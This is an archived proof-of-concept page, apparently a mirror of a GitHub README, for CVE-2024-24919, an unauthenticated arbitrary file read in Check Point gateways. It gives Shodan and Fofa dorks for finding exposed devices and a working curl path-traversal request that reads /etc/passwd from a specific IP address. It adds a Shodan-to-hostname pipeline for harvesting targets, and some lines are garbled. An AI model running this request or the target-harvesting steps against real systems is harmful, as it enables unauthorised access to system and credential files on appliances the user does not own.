关联漏洞
介绍
# CVE-2024-24919-POC
### Read about it - https://nvd.nist.gov/vuln/detail/CVE-2024-24919
### The vulnerability allows an unauthenticated remote attacker to read the contents of an arbitrary file located on the affected appliance.
#### Nuclei Template: https://github.com/johnk3r/nuclei-templates/blob/c226ece895c8e4e6aec22aff66f21e5b8b70e08e/http/cves/2024/CVE-2024-24919.yaml
#### Shodan Dork: title:"Check Point" || "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"
#### Fofa Dork: app="Check_Point-SSL-Network-Extender"
### This POC is made for educational and ethical testing purposes only. Usage of this tool for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
# "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"
title:"Check Point" ssl:"target \
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: 212.179.13.8' -H $'Content-Length: 39' -H $'Connection: keep-alive' \
--data-binary $'aCSHELL/../../../../../../../etc/passwd' \
$'https://212.179.13.8/clients/MyCRL' \
shodan search --fields ip_str,port,org "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" > search.txt \
awk '{print $1}' search.txt > results.txt \
cat results.txt | hakip2host \
https://github.com/hakluke/hakip2host
https://www.youtube.com/watch?v=PAWvQ3y0T2g
文件快照
[4.0K] /data/pocs/00a53e6817e7665322f9624b97ac5a8422796ec0
├── [4.6K] exploit.py
└── [1.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。